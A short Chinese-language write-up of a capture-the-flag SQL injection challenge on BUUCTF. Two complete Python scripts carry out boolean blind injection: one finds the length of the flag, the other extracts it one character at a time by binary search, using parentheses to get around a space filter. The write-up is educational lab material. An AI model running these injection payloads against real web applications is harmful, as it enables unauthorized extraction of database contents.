这个题呢,上来就把表名和列名都告诉了,就差查询了
发现输入1
Hello, glzjin wants a girlfriend.
输入2
Do you want to be my girlfriend?
而输入0
Error Occured When Fetch Result.
这就让我们想到布尔盲注,不过要使用if函数来判断是否符合
先查询长度,因为空格被过滤了,所以必须用括号代替了
import requests
url = "http://64b562ce-66ec-49db-9507-77e5cd05b9f2.node4.buuoj.cn:81/index.php"
len = 1;
while(True):
data = {"id": f"if(length((select(flag)from(flag)))={len},1,0)"}
r = requests.post(url,data=data)
if('Hello, glzjin wants a girlfriend.' in r.text):
break;
print(len,end='\n')
len += 1
print(f"flag长度为{len}")
运行一遍,得到flag长度为42
然后获取flag(水平太低代码可能写的不规范)
import requests
import time
url = "http://d2eaa69a-ae3a-4ad5-a1ac-b65ebe1da1bf.node4.buuoj.cn:81/"
flag = ''
for x in range(1,43):
left = 33
right = 126
while(right > left):
mid = int((left + right + 1) / 2)
data = {'id':f"if(ascii(substr((select(flag)from(flag)),{x},1))>={mid},1,0)"}
r = requests.post(url,data=data)
if('Hello, glzjin wants a girlfriend.' in r.text):
left = mid
else:
right = mid - 1
time.sleep(0.1)
flag += chr(right)
print(flag)
print(f"flag为{flag}")
然后获得flag